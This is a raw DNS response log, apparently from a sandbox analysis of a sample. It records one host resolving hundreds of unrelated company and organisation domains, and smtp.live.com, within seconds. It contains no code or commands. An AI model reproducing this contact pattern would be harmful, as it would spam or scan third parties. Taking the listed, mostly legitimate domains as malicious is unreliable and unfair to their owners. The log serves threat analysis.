Mar 22, 2023 05:44:59.346788883 CET	8.8.8.8	192.168.2.5	0x3efc	No error (0)	gbp-jp.com		208.80.123.104	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.459337950 CET	8.8.8.8	192.168.2.5	0x6015	No error (0)	infotech.pl		79.96.32.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.462598085 CET	8.8.8.8	192.168.2.5	0x19d3	No error (0)	diamir.de		138.201.65.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.463346958 CET	8.8.8.8	192.168.2.5	0x8f3	No error (0)	paraski.org		94.130.164.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.496372938 CET	8.8.8.8	192.168.2.5	0xe06a	No error (0)	mackusick.de		217.160.0.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.502628088 CET	8.8.8.8	192.168.2.5	0x8933	No error (0)	awal.ws		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.518815041 CET	8.8.8.8	192.168.2.5	0x6797	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.547489882 CET	8.8.8.8	192.168.2.5	0x92c	No error (0)	camamat.com		104.21.235.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.547489882 CET	8.8.8.8	192.168.2.5	0x92c	No error (0)	camamat.com		104.21.235.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.575551987 CET	8.8.8.8	192.168.2.5	0xd718	No error (0)	banvari.com		23.227.38.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.677627087 CET	8.8.8.8	192.168.2.5	0x6f19	No error (0)	kamptal.at		128.204.134.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.686831951 CET	8.8.8.8	192.168.2.5	0x1479	No error (0)	missnue.com		104.21.234.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.686831951 CET	8.8.8.8	192.168.2.5	0x1479	No error (0)	missnue.com		104.21.234.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.727921009 CET	8.8.8.8	192.168.2.5	0x1f92	No error (0)	shittas.com		43.246.117.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.807260036 CET	8.8.8.8	192.168.2.5	0x473d	No error (0)	ccssinc.com		104.21.19.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.807260036 CET	8.8.8.8	192.168.2.5	0x473d	No error (0)	ccssinc.com		172.67.185.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.811338902 CET	8.8.8.8	192.168.2.5	0xbaa2	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.817646980 CET	8.8.8.8	192.168.2.5	0x4d34	No error (0)	pertex.com		185.151.30.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.890151024 CET	8.8.8.8	192.168.2.5	0x9bd6	No error (0)	kamptal.at		128.204.134.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.891463995 CET	8.8.8.8	192.168.2.5	0x3953	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.023145914 CET	8.8.8.8	192.168.2.5	0x80d3	No error (0)	siongann.com		172.67.156.237	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.023145914 CET	8.8.8.8	192.168.2.5	0x80d3	No error (0)	siongann.com		104.21.8.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.026838064 CET	8.8.8.8	192.168.2.5	0x3ee2	No error (0)	nolaoig.org		54.212.145.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.026859999 CET	8.8.8.8	192.168.2.5	0x3563	No error (0)	kevyt.net		104.21.2.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.026859999 CET	8.8.8.8	192.168.2.5	0x3563	No error (0)	kevyt.net		172.67.129.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.133915901 CET	8.8.8.8	192.168.2.5	0x4110	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.395128012 CET	8.8.8.8	192.168.2.5	0x44bc	No error (0)	softizer.com		185.163.45.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.569293022 CET	8.8.8.8	192.168.2.5	0x61b4	No error (0)	k-nikko.com		18.177.67.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.590827942 CET	8.8.8.8	192.168.2.5	0x5bd9	No error (0)	mjrcpas.com		154.81.136.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.695926905 CET	8.8.8.8	192.168.2.5	0x1438	No error (0)	yasuma.com		61.200.81.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.744932890 CET	8.8.8.8	192.168.2.5	0xf029	No error (0)	host.do		217.79.248.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.746978045 CET	8.8.8.8	192.168.2.5	0x3278	No error (0)	karmy.com.pl		185.253.212.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.766552925 CET	8.8.8.8	192.168.2.5	0x454d	No error (0)	vdoherty.com		91.216.241.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.776747942 CET	8.8.8.8	192.168.2.5	0x8224	No error (0)	pertex.com		185.151.30.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.790288925 CET	8.8.8.8	192.168.2.5	0xa34c	No error (0)	kursavto.ru		31.177.80.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.790288925 CET	8.8.8.8	192.168.2.5	0xa34c	No error (0)	kursavto.ru		31.177.76.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.799680948 CET	8.8.8.8	192.168.2.5	0xf388	No error (0)	esmoke.net		204.15.134.44	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.811738968 CET	8.8.8.8	192.168.2.5	0x707c	No error (0)	zugseil.com		92.42.191.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.839701891 CET	8.8.8.8	192.168.2.5	0x166	No error (0)	simetar.com		104.21.79.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.839701891 CET	8.8.8.8	192.168.2.5	0x166	No error (0)	simetar.com		172.67.146.154	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.883932114 CET	8.8.8.8	192.168.2.5	0xfe80	No error (0)	mondopp.net		173.231.184.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.976840019 CET	8.8.8.8	192.168.2.5	0xd4c	No error (0)	btsi.com.ph		69.46.30.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.977190018 CET	8.8.8.8	192.168.2.5	0x2f17	No error (0)	dbnet.at		188.94.254.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:00.983452082 CET	8.8.8.8	192.168.2.5	0xdcbc	No error (0)	pleszew.policja.gov.pl		91.229.22.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.130220890 CET	8.8.8.8	192.168.2.5	0x14cd	No error (0)	adeesa.net		172.67.209.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.130220890 CET	8.8.8.8	192.168.2.5	0x14cd	No error (0)	adeesa.net		104.21.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.132327080 CET	8.8.8.8	192.168.2.5	0x295d	No error (0)	lpver.com		92.204.129.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.179013014 CET	8.8.8.8	192.168.2.5	0xef7d	No error (0)	plaske.ua		52.211.245.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.180574894 CET	8.8.8.8	192.168.2.5	0x35b5	No error (0)	dwid.de		87.230.93.218	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.220505953 CET	8.8.8.8	192.168.2.5	0xda3f	No error (0)	paraski.org		94.130.164.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.234321117 CET	8.8.8.8	192.168.2.5	0xfb01	No error (0)	cyclad.pl		87.98.236.253	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.318378925 CET	8.8.8.8	192.168.2.5	0x95ef	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.418193102 CET	8.8.8.8	192.168.2.5	0x824a	No error (0)	sjbmw.com		198.199.101.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.461545944 CET	8.8.8.8	192.168.2.5	0xb578	No error (0)	akdeniz.nl		109.71.54.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.674676895 CET	8.8.8.8	192.168.2.5	0x6ab4	No error (0)	forbin.net		172.67.148.35	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.674676895 CET	8.8.8.8	192.168.2.5	0x6ab4	No error (0)	forbin.net		104.21.41.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.733634949 CET	8.8.8.8	192.168.2.5	0xfcec	No error (0)	gbp-jp.com		208.80.123.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.733634949 CET	8.8.8.8	192.168.2.5	0xfcec	No error (0)	gbp-jp.com		208.80.122.2	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.733634949 CET	8.8.8.8	192.168.2.5	0xfcec	No error (0)	gbp-jp.com		208.80.122.205	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.733634949 CET	8.8.8.8	192.168.2.5	0xfcec	No error (0)	gbp-jp.com		208.80.123.104	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.733755112 CET	8.8.8.8	192.168.2.5	0xd046	No error (0)	cjcagent.com		157.112.187.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.755337000 CET	8.8.8.8	192.168.2.5	0xb6ff	No error (0)	deckoviny.cz		88.86.118.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.800033092 CET	8.8.8.8	192.168.2.5	0xaf48	No error (0)	mikihan.com		153.126.211.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.826877117 CET	8.8.8.8	192.168.2.5	0xefc5	No error (0)	dwid.de		87.230.93.218	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.861821890 CET	8.8.8.8	192.168.2.5	0x9ba9	No error (0)	top1oil.com		104.26.0.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.861821890 CET	8.8.8.8	192.168.2.5	0x9ba9	No error (0)	top1oil.com		104.26.1.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.861821890 CET	8.8.8.8	192.168.2.5	0x9ba9	No error (0)	top1oil.com		172.67.71.55	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.862763882 CET	8.8.8.8	192.168.2.5	0x6901	No error (0)	envogen.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.862763882 CET	8.8.8.8	192.168.2.5	0x6901	No error (0)	envogen.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.899699926 CET	8.8.8.8	192.168.2.5	0x9d93	No error (0)	rast.se		89.221.250.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.912386894 CET	8.8.8.8	192.168.2.5	0x334b	No error (0)	pcoyuncu.com		213.142.131.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.940501928 CET	8.8.8.8	192.168.2.5	0x2055	No error (0)	acraloc.com		192.64.150.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.967428923 CET	8.8.8.8	192.168.2.5	0xe598	No error (0)	com-edit.fr		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.967446089 CET	8.8.8.8	192.168.2.5	0xb543	No error (0)	techtrans.de		185.237.66.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.004400969 CET	8.8.8.8	192.168.2.5	0x7b93	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.051137924 CET	8.8.8.8	192.168.2.5	0x95b0	No error (0)	banvari.com		23.227.38.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.062083960 CET	8.8.8.8	192.168.2.5	0xbeff	No error (0)	t-trust.jp		183.181.82.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.068669081 CET	8.8.8.8	192.168.2.5	0x81f6	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.069394112 CET	8.8.8.8	192.168.2.5	0x674b	No error (0)	mackusick.com		217.160.0.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.075752974 CET	8.8.8.8	192.168.2.5	0xe5b6	No error (0)	amerifor.com		64.18.191.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.098026991 CET	8.8.8.8	192.168.2.5	0xfa1c	No error (0)	apcotex.com		35.154.163.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.104788065 CET	8.8.8.8	192.168.2.5	0xc76c	Name error (3)	haigh-me.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.148881912 CET	8.8.8.8	192.168.2.5	0x156a	No error (0)	redgiga.com		104.21.76.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.148881912 CET	8.8.8.8	192.168.2.5	0x156a	No error (0)	redgiga.com		172.67.186.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.175332069 CET	8.8.8.8	192.168.2.5	0xd261	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.190256119 CET	8.8.8.8	192.168.2.5	0xac65	No error (0)	jabian.com		104.26.7.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.190256119 CET	8.8.8.8	192.168.2.5	0xac65	No error (0)	jabian.com		172.67.71.13	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.190256119 CET	8.8.8.8	192.168.2.5	0xac65	No error (0)	jabian.com		104.26.6.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.225775957 CET	8.8.8.8	192.168.2.5	0x86b8	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.227835894 CET	8.8.8.8	192.168.2.5	0xf25e	No error (0)	ascc.org.au		203.210.102.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.242999077 CET	8.8.8.8	192.168.2.5	0xfb84	No error (0)	gbmfg.com		151.101.2.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.242999077 CET	8.8.8.8	192.168.2.5	0xfb84	No error (0)	gbmfg.com		151.101.66.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.242999077 CET	8.8.8.8	192.168.2.5	0xfb84	No error (0)	gbmfg.com		151.101.130.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.242999077 CET	8.8.8.8	192.168.2.5	0xfb84	No error (0)	gbmfg.com		151.101.194.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.253561974 CET	8.8.8.8	192.168.2.5	0x5a01	No error (0)	duiops.net		135.125.108.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.278630972 CET	8.8.8.8	192.168.2.5	0xbe46	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.279793978 CET	8.8.8.8	192.168.2.5	0x7058	No error (0)	muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.282393932 CET	8.8.8.8	192.168.2.5	0xb0db	No error (0)	rokoron.com		211.13.204.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.302272081 CET	8.8.8.8	192.168.2.5	0x964	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.318018913 CET	8.8.8.8	192.168.2.5	0x328d	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:02.318018913 CET	8.8.8.8	192.168.2.5	0x328d	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:02.318018913 CET	8.8.8.8	192.168.2.5	0x328d	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:02.318018913 CET	8.8.8.8	192.168.2.5	0x328d	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.395454884 CET	8.8.8.8	192.168.2.5	0x5b00	No error (0)	lpver.com		92.204.129.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.432693005 CET	8.8.8.8	192.168.2.5	0x5cb	No error (0)	ruzee.com		207.180.198.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.474466085 CET	8.8.8.8	192.168.2.5	0x98b3	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.498178005 CET	8.8.8.8	192.168.2.5	0x3629	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.522835970 CET	8.8.8.8	192.168.2.5	0x3ffc	No error (0)	orlyhotel.com		172.67.156.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.522835970 CET	8.8.8.8	192.168.2.5	0x3ffc	No error (0)	orlyhotel.com		104.21.48.207	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.526804924 CET	8.8.8.8	192.168.2.5	0xeca	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.538403034 CET	8.8.8.8	192.168.2.5	0x51e5	No error (0)	workplus.hu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.538403034 CET	8.8.8.8	192.168.2.5	0x51e5	No error (0)	workplus.hu		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.544146061 CET	8.8.8.8	192.168.2.5	0xcfbf	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.555191994 CET	8.8.8.8	192.168.2.5	0x9bef	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.570095062 CET	8.8.8.8	192.168.2.5	0x105d	Name error (3)	www.yumgiskor.kz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.572423935 CET	8.8.8.8	192.168.2.5	0x86d5	No error (0)	hbfuels.com		85.233.160.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.591308117 CET	8.8.8.8	192.168.2.5	0x6785	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.604760885 CET	8.8.8.8	192.168.2.5	0xa6ba	No error (0)	cubodown.com		172.67.150.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.604760885 CET	8.8.8.8	192.168.2.5	0xa6ba	No error (0)	cubodown.com		104.21.30.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.649701118 CET	8.8.8.8	192.168.2.5	0x3882	No error (0)	arowines.com		104.164.117.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.671710968 CET	8.8.8.8	192.168.2.5	0x9a2a	No error (0)	awal.ws		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.783830881 CET	8.8.8.8	192.168.2.5	0xbca1	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.794286013 CET	8.8.8.8	192.168.2.5	0x13a0	No error (0)	hyab.se		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.794286013 CET	8.8.8.8	192.168.2.5	0x13a0	No error (0)	hyab.se		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.814158916 CET	8.8.8.8	192.168.2.5	0xc2cd	No error (0)	web-york.com		219.94.129.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.836025000 CET	8.8.8.8	192.168.2.5	0x434f	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.836025000 CET	8.8.8.8	192.168.2.5	0x434f	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.837898970 CET	8.8.8.8	192.168.2.5	0xad01	No error (0)	cutchie.com		199.59.243.223	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.865397930 CET	8.8.8.8	192.168.2.5	0x372b	No error (0)	wahw.com.au		54.194.190.151	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.892874956 CET	8.8.8.8	192.168.2.5	0xc080	No error (0)	hchc.org		34.224.10.110	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.892874956 CET	8.8.8.8	192.168.2.5	0xc080	No error (0)	hchc.org		52.11.37.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.945875883 CET	8.8.8.8	192.168.2.5	0x19ba	No error (0)	captlfix.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.945875883 CET	8.8.8.8	192.168.2.5	0x19ba	No error (0)	captlfix.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.945875883 CET	8.8.8.8	192.168.2.5	0x19ba	No error (0)	captlfix.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.945875883 CET	8.8.8.8	192.168.2.5	0x19ba	No error (0)	captlfix.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.017407894 CET	8.8.8.8	192.168.2.5	0x3dc5	No error (0)	awal.ws		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.020643950 CET	8.8.8.8	192.168.2.5	0x1833	No error (0)	assideum.com		52.219.94.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.042458057 CET	8.8.8.8	192.168.2.5	0x676e	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.042458057 CET	8.8.8.8	192.168.2.5	0x676e	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.042458057 CET	8.8.8.8	192.168.2.5	0x676e	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.042458057 CET	8.8.8.8	192.168.2.5	0x676e	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.152967930 CET	8.8.8.8	192.168.2.5	0x394d	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.152967930 CET	8.8.8.8	192.168.2.5	0x394d	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.162273884 CET	8.8.8.8	192.168.2.5	0x4e1e	No error (0)	mkm-gr.com		79.124.76.247	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.163954020 CET	8.8.8.8	192.168.2.5	0x59ca	No error (0)	amic.at		78.46.224.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.172921896 CET	8.8.8.8	192.168.2.5	0xfa06	No error (0)	ramkome.com		62.75.216.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.188896894 CET	8.8.8.8	192.168.2.5	0xaf91	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.188896894 CET	8.8.8.8	192.168.2.5	0xaf91	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.221112967 CET	8.8.8.8	192.168.2.5	0x4139	No error (0)	araax.com	traff-3.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:03.221112967 CET	8.8.8.8	192.168.2.5	0x4139	No error (0)	traff-3.hugedomains.com	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:03.221112967 CET	8.8.8.8	192.168.2.5	0x4139	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.19.116.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.221112967 CET	8.8.8.8	192.168.2.5	0x4139	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.18.7.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.320672035 CET	8.8.8.8	192.168.2.5	0x4e3	No error (0)	notis.ru		185.178.208.141	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.325545073 CET	8.8.8.8	192.168.2.5	0x41b5	No error (0)	smtp.live.com	a-0010.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:03.337029934 CET	8.8.8.8	192.168.2.5	0xc621	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.337029934 CET	8.8.8.8	192.168.2.5	0xc621	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.358629942 CET	8.8.8.8	192.168.2.5	0xc64d	No error (0)	floopis.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.361820936 CET	8.8.8.8	192.168.2.5	0x10af	No error (0)	dzm.cz		83.167.255.150	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.366858006 CET	8.8.8.8	192.168.2.5	0x1536	No error (0)	listel.co.jp		49.212.243.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.414824963 CET	8.8.8.8	192.168.2.5	0xcc10	No error (0)	icd-host.com		192.252.159.165	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.414824963 CET	8.8.8.8	192.168.2.5	0xcc10	No error (0)	icd-host.com		192.252.159.116	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.420965910 CET	8.8.8.8	192.168.2.5	0x8213	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.429934025 CET	8.8.8.8	192.168.2.5	0x5ede	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.456136942 CET	8.8.8.8	192.168.2.5	0x5dc2	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.491734982 CET	8.8.8.8	192.168.2.5	0xe6d4	No error (0)	indonesiamedia.com		74.208.215.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.495165110 CET	8.8.8.8	192.168.2.5	0x8a82	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.532439947 CET	8.8.8.8	192.168.2.5	0x1eb3	No error (0)	ccrsi.org		198.209.253.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.560339928 CET	8.8.8.8	192.168.2.5	0xf837	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.560339928 CET	8.8.8.8	192.168.2.5	0xf837	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.583653927 CET	8.8.8.8	192.168.2.5	0x9bef	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.585369110 CET	8.8.8.8	192.168.2.5	0x29e0	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.587471962 CET	8.8.8.8	192.168.2.5	0xeeb3	No error (0)	aba.org.eg		192.169.149.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.598836899 CET	8.8.8.8	192.168.2.5	0xfb5	No error (0)	atb-lit.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.635623932 CET	8.8.8.8	192.168.2.5	0xa8fd	No error (0)	usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.650250912 CET	8.8.8.8	192.168.2.5	0xf7b8	No error (0)	stopllc.com		162.241.233.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.664613008 CET	8.8.8.8	192.168.2.5	0xd091	No error (0)	aluminox.es		37.59.243.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.666848898 CET	8.8.8.8	192.168.2.5	0xc902	No error (0)	bible.org		104.20.54.214	A (IP address)	IN (0x0001)	false
